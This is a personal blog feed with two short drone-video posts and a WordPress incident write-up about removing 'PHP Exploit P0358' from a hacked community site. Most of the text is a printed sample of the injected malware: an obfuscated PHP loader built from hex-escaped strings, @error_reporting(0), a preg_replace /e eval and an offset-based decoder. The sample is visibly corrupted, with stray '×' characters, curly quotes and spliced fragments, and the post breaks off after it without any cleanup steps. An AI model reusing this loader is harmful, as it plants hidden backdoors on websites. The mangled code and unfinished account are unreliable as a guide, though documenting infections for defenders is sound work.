sascha.us

New York City as you have never seen before

Sascha Endlicher, M.A. — Sun, 26 Feb 2023 16:06:47 +0000

View from Central Park at an elevation of 200 feet.

Gutenberg Block:

Shortcode:

The post New York City as you have never seen before appeared first on sascha.us.

My first flight with the DJI Phantom Vision 2+.

Sascha Endlicher, M.A. — Mon, 25 Aug 2014 12:40:00 +0000

Some impressions of my first flight with the DJI Phantom Vision 2+.
Footage was taken in Kitty Hawk in the Outer Banks in North Carolina.

The post My first flight with the DJI Phantom Vision 2+. appeared first on sascha.us.

Clean WordPress from PHP Exploit P0358

Sascha Endlicher, M.A. — Mon, 21 Jul 2014 11:03:22 +0000

Last weekend, the website of a popular German WordPress community has been hacked. The owner of the site asked for help via the official Facebook fanpage. It was on a Saturday afternoon, it was hot outside, the best possible weather to spend time at the pool or lake and of course, the worst time to get hacked. In the back of my head there was still buzzing around an article I had read recently about the German WordPress community. The article was basically saying that people do not return enough to the community for what they get. So for me there was no way to let the operator of an aesthetic WordPress community site suffer (even if it was not the German WordPress community). They have provided me with quality content over the last few months, so I decided to call and offer my help.

The hack was a little different than what you typically see done to WordPress sites. It wasn’t a defacement where a fanatic would try to broadcast his fanatical messages to the visitors of the site. In this particular case, I found a code injection in the first line of some PHP files, but the code was dynamic and looked different if you’d compare compromised files with each other. So I was trying to find a signature of the code. I contacted the developer of a wonderful and highly esteemed security suite. My goal was to get more information about the exploit, because the developer’s software detects the exploit as PHP Exploit P0358, but of course I got no answer on the weekend. So I ran a diff on two contaminated files. The result looked like this:

$xcaudxkspk$intygvhpad = ‘%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>11<%x5c%x78%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x5c%25)sf%x5c%x7878pmpusut)tpqss5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%hA%x5c%x7827pd%x5c%x78256>2*!%x5c%x7825zmg%x5c%x7825)!gj!~>}R;msv}.;%x5c%x782f#%xmjg}[;ldpt%x5c%x7825}K;%x5c%x5c%x7825j:>>1*!%x5c%x7825b:fh%x5c%x7825:<**#57]3>1%x5c%x7825s:8223}!+!<+{e%x5c%x7825+*!*+fepdfe{if((function_exists(”%x6f%142%x5f%181]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]opd%x5c%x7860ufh%x5c%x7860f5c%x7824*!#]y3d]51]y35]256]y76]72]y3d]56985:6197g:74985-rr.93e:55%x5c%x785c%x5c%x7825j:^‘5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%svmt+fmhpph#)zbssb!-#}#)fepmqnj!bs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+q825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usx7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x7860hA%x5c%x7827pd%x5c%x78256<%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825t5]Ke]53Ld]53]Kc]55Ld]55#*<%x5825))!gj!<*#cd2bge56+9938687f_*#fmjgk4%x5c%x7860{6~62q%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5×782f#M5]DgP5]D6#<%x5cx5c%x7824-%x5c%x7824*j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!c%x7824-%x5c%x7824*!}%x5c%x7827;!>>>!}_;gvc%825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]827&6<%x5c%x787fw6*%x5c%x787f_*#[k2x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%xx5c%x7825Z<^2%x5c%x785c2b%x5c%x78vg}{;#)tutjyf%x5c%x7860opju5<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)s5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,<.4%x5c%x7860hA%x5c%x7827pd%x]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]28825b:>%x5c%x7825s:%x5ussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x5nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5#]y76]277]y72]265]y39]271]y83]256]y7%x5c%x782f!#0#)idubn%x5j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5cx7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-buR;2]},;osvufs}%x5c%x7827;mnui}&;zeC%x5c%x7827pd%x5c%x782gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsx5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782fj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%M*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6!%x5c%x7825i%x5c60sfqmbdf)%x5c%x7825%x5c%x782%x7827u%x5c%x7825)7fmji%x5c%x78786!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmj{hnpd19275fubmgoj{h1:|:5%156%x61″])))) { $GLOBALS[“%x61%156%x75%156%x61”]=1; functio6-%x5c%x7878r.985:52985-t.98]K4]65]D8]8bs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!*2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)825)!gj!|!*1?hmg%x5cJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x7825256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)umg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x~!!%x5c%x7825s:N}#-%x5c2fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%%x782272qj%x5c%x7825)7gj6<**2qj%xgpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*q}Z;^nbsbq%x5c%x7825%72]58y]472]37y]672]48y]#>L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%xx5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-f#0#%x5c%x782f*#npd%x#@#7%x5c%x782f7^#iubq#%x5c7878:-!%x5c%x7825tzw%x60439275ttfsqnpdov{h19275j{hnpd19275fu7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825zb%x5c%x7825Z<#opo#>b%x5c%x7825!*oV;hojepdoF.uofuopD#)sfebfI{***b%x5c%x7825)sf%x5c%x7878pmx5c%x78256<#o]1%x5c%x5c%x782f#)rrd%x5c%x782f#00_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782×7825w:!>!%x5c%x78246767~6!%x5c%x7825i%x5c%x785c2^!tus%x5c%x7860sfqmbdf5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#8;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5cW%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%xNULL); }c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cn fjfgg($n){return chr(ord($n)-1);} @error_reporting(0); preg_replace)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x782%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]2%x5c%x7824]y8%x5c%x7824-%x5c%x782×7860ufldpt}X;%x5c%x7860msvdosvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!h%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825n%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>7**111127-K)ebfsX%x5c%4-%x5c%x7824%x5c%x785c%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%”,”%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162osvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!x78257-K)fujs%x5c%x7878X6<#986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<4#-!OVMM*<%x22%51%x29%51%x29%73″, 5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y62]38y]572]48y]#>m%x7860%x5c%x7825}X;!sp)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmd7827pd%x5c%x78256.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x87f<*X&Z&S{ftmfV%x5c%x787f<#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x782%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256^#zsfvr#%x5c%x785cdovg}{;#)tutjyf%x5c%x7860opju6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%xx7825ggg!>!#]y81]273]y76]258]y6g]273]y%x7825l}S;2-u%x5c%x7825!–%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{7-UFOJ%x5c%x7860GB)fub3)%x5c%x7825cB%x5c%x7osvufs!*!+A!>!{e%x5c%x7825)!5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824%x5c%x7825fdy!%x5c%x25j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%XA6~6%x5c%x782f7&6|~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x78o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%1<%x5c%x7825j=6[%x5pcotn+qsvmt+fmhpph#)zbssb!-#}#)f1]y35]274]y4:]82]y3:]62]y4c#!#]y84]275]y83]273]y76]277#32n%x5c%x7825<#35c%x7860msvd}+;!>!}%x4]26%x5c%x7824-%x5c%x7824<%x5c%x782825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x7y7d]252]y74]256#>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825×7825r%x5c%x7878W~!Ypp2)%x5c%5c%x7825=*h%x5c%x7825)m%x5c%x7}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c#2#%x5c%x782f#%x5c%x7825#%x)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%epmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x785c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M%x61%171%x5f%155%x61%160%x28%42%x66%1524-%x5c%x7824!>!fyqmpef)#%xs%x5c%x7825<#462]47y]252]18y]pusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobx5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860]368]322]3]364]6]283]427825ff2!>!bssbz)%x5c%x7824]25%x5c%x60TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%xfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5cx7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2825t::!>!%x5c%x7824Ypp825):fmji%x5c%x7878:<##:>:h%x5c%xx7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!h*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gjsbut%x5c%x7860cpV%x5cx7825z-#:#*%x5c%x78247824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%tsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x#65,47R25,d7R17,67R37,#%x5c%x78p%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%xufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjuw%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c63%x74%141%x72%164″)function c%x787f;!opjudovg}k~~9{d%x5c%x7825f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x:osvufs:~928>>%x5c%x7822:ftmbg39*K78:56985:6197g:74985-rr.93e:559bE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5<*9-1-r%x5c%x7825)s%x5c%x782W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73″, NULL); }|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x78uopd%x5c%x7860ufh%x5c%x7860fZ6<.5%x5c%x7860hA%x5c%^,%x5c%x7825b:%x5c%x782860gvodujpo)##-!#~<#%x5c%x782f%x5824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%NFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%2f#@#%x5c%x782fqp%x5c%xesp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-c%x7822)!gj}1~!<2p%x5c%x7×7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|5c%x7860QUUI&e_SEEB%x5c%x7860FUPc%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x782556^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7h%x5c%x7825)j{hnpd!opjudovg!787fm%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op5s:%x5c%x785c%x5c%x7825j:^s%x5c%x7825<#46×782fq%x5c%x7825>U<#16,47R57,2%x5c%x7825)3of)fepdof%x5c%x7860578273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%s)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-364]6]283]427]36]373P6]36]73]8#%x5c%x7824-%x5c%x7824-tusqoepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x8]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y8562]y4c#!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!t00~:!bssbz)%x5c%x7824]25%x57827!hmg%x5c%x7825)!gj!|!*AZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M62f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%xe7y]#>n%x5c%x7825<#372]58y]4c%x7825)utjm!|!*5!%x5c%xx6f%142%x5f%163%x74%141%x72%164″) && (!isset($GLOBALS[“%x61%156%x75%5c%x782f#o]#%x5c%x782f*)323zbe!%x787fw6*%x5c%x787f_*#ujojRk3%x5c%h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-5c%x7825fdy)##-!#~<%x5c%x7825h00#7825!<*::::::-111112)eo342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboeutRe%x5c%x7825)Rd%x5j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sut7-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x]273]y72]282#!#]y84]275]y83]248]y8c%x78256}&;!%x787f%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x7825s:cvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7ssbnpe_GMFT%x5c%x7860QIQ87fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofu8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f77825!<5h%x5c%x7825%x5c%x782825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x%x5c%x7825w6Z6<.5%x5c%x7860))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!!2p%x5c%x7825Z<^2%x5c%x785c]36]373P6]36]73]83]238M7]3%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860f%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>25c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3347825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFN75]y7:]268]y7f#!%x5c%x782400~:q%x5c%x7825<#762]67y]5>>%x5c%x7822!ftmbg)!gj<*#k#)u5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824:iuhofm%x5c%25w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x76]271]y7d]252]y74]256#2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopdfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]8782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x785bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#dovg)!gj!|!*msv%x5c%x7825)}k~~~!#]y76]277]y72]/(.*)/epreg_replacevsvuvovphv’; $lafezcehhd%x7825rN}#QwTW%x5c%x7825hx7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu42%x2c%163%x74%162%x5f%163%x70%154%utcvt)fubmgoj{hA!osvufs!~<3,j%825)!gj!<2,*j%x5c%x7825-#1b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x78pc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%#)fepmqyf%x5c%x7827*&7-n%x5cx78256<*17-SFEBFI,6<(!isset($GLOBALS[“%x61%156%x7#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#7#@#7%x5c%x782f7^#iubq#%x5c%x7858]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]6)fepmqyfA>2b%x5c%x7825!<*qc%x7860{66~6<&w6<%x5c%x787fw6dz>#L4]275L3]248L3P6L1M5|:**t%x5c%x7825)m%x5c%x7eTQcOc%x5c%x782f#00#W~!Ydrr)%2^-%x5c%x7825hOh%x5c%x782f25>%x5c%x782fh%x5c%x78*CW&)7gj6<*doj%x5c%x78257-C)fepmq5j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>11<%x5c%x782!*)323zbek!~!>2*!%x5c%x7825z>32>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x78njA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x75t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7×5c%x7825r%x5c%x7878Bsfuvso!sb>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#!ssbnpe_GMFT%%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7×5c%x7825}&;ftmbg}%x5c%x7d%160%x6c%157%x64%145%x28%141%x72*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)q%x5c%x7825:>:r%x5c%x7825:5c%x78256!%x5c%x78242178}527}7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x52]47y]252]18y]#>q%x5c%x7825<#762]67y]562]32f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^x5c%x7878;0]=])0#)U!%x5c%x7827{fw6*CWtfs%x5c%x7825)7gif((function_exists(”%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%5025)+opjudovg+)!gj+{e%x5c%x7D!-id%x5c%x7825)uqpuftpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x78c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878p85cSFWSFT%x5c%x7860%x5c%x7825}X>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x51?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)8256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%@error_reporting(0); preg_replace(”%x2f%50%x2e%52%x29%57%x65″,”%x65%f#p#%x5c%x782f%x5c%x78y6g]273]y76]271]y7d]252]y74]256#j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%uvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782c%x785c%x5c%x7825j:.25c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x7%x7825j^%x5c%x7824-%x5c%x7824tvctu825%x5c%x787f!~!<##!>!2p%72]y3d]51]y35]274]y4:]82]y3:]87f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudo5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~!%x5c%x78247860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}c%x7824-%x5c%x7824-!%25:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%xc%x787f!b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>febfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x5c%x7825w6Z6<.2%x5c%x78-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x78K9]78]K5]53]Kc#<%x5c78257;utpI#7>%x5c%x782p%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]!#]y3d]51]y35]256]y76]Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x7%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofx5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#11<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x782-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x77ftbc%x5c%x787f!|!*uyfu%xw!>!#]y84]275]y83]273]y76]277#<%x5c%x782*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78×7827pd%x5c%x78256!fyqmpef)#%x5c%x7824*#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVM?]_%x5c%x785c}X%x5c%x7824!#]y76]x5c%x7860QIQ&f_UTPI%x]#-bubE{h%x5c%x7825)tpqsut>j%xc%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2%x5c%x782f7&6|7**111127-K)ebfsX%x5c166%x61%154%x28%151%x6%x5c%x7860msvd},;uqpuft%x5c%x7860msfjfgg($n){return chr(ord($n)-1);} dovg)!gj!|!*msv%x5c%x7825)}k~~~ = explode(chr((208-164)),’668,35,7326,55,1056,59,3462,69,2882,27,4107,67,6304,38,9229,52,67,67,1625,59,2785,33,8582,27,214,58,5854,60,4496,64,7867,26,8984,38,4426,70,5259,33,4005,22,907,57,4241,27,5346,39,2677,21,9878,50,1316,56,9613,63,4927,22,6603,50,1684,33,8932,52,2448,29,8441,60,1955,26,4690,62,9193,36,3420,42,8824,49,7056,39,996,60,5059,35,4781,39,2930,52,9456,70,9076,58,1276,40,7735,43,7412,34,464,28,7893,33,8330,67,773,27,523,28,3731,28,6066,46,7778,38,5721,21,6865,54,7219,56,4752,29,9968,38,4174,67,3811,50,1372,67,162,52,6764,62,349,38,1871,63,8248,58,1256,20,3941,64,7679,56,8178,70,9710,60,8704,27,1210,46,1717,68,7126,43,8501,27,1934,21,2698,26,4560,52,1510,60,9676,34,7573,23,1154,56,2649,28,6398,39,2549,24,5422,32,6178,65,134,28,7659,20,9399,27,8657,47,8306,24,1570,55,6437,45,2982,42,2573,47,5937,70,6139,39,5561,68,1785,20,7973,21,4406,20,492,31,964,32,7994,67,3759,52,5292,54,2003,38,9426,30,5094,50,634,34,7446,43,4970,28,9305,29,6954,21,8061,52,444,20,4612,27,6826,39,7095,31,1462,48,9557,56,2620,29,7275,51,8757,67,6919,35,5144,28,3321,57,4858,25,6112,27,7381,31,10040,66,2385,63,7816,51,5491,70,3637,61,9134,59,2724,61,579,21,2272,53,2477,23,8528,54,6036,30,6731,33,5686,35,1805,25,6369,29,9281,24,4386,20,9334,65,4998,61,2107,43,5829,25,6506,34,3576,61,4027,22,3861,42,3270,51,10006,34,6975,21,3236,34,3531,45,3698,33,5742,35,3191,45,2500,49,4883,44,2150,54,3024,47,6342,27,800,56,5454,37,6709,22,4949,21,5777,52,2818,64,3141,28,4049,58,6007,29,6653,56,3378,34,2204,68,7489,51,4639,51,9928,40,2909,21,856,26,5914,23,1115,39,7926,47,3169,22,8397,44,6243,61,4342,44,9770,67,387,57,3903,38,5172,41,7169,50,7540,33,9022,54,6482,24,8731,26,703,70,7596,63,8609,48,4268,40,1439,23,0,67,5213,46,551,28,600,34,8113,65,882,25,8873,59,5385,37,2325,60,328,21,5629,57,6540,63,1981,22,272,56,1830,41,6996,60,4820,38,9526,31,2041,66,3071,70,9837,41,4308,34,3412,8′); 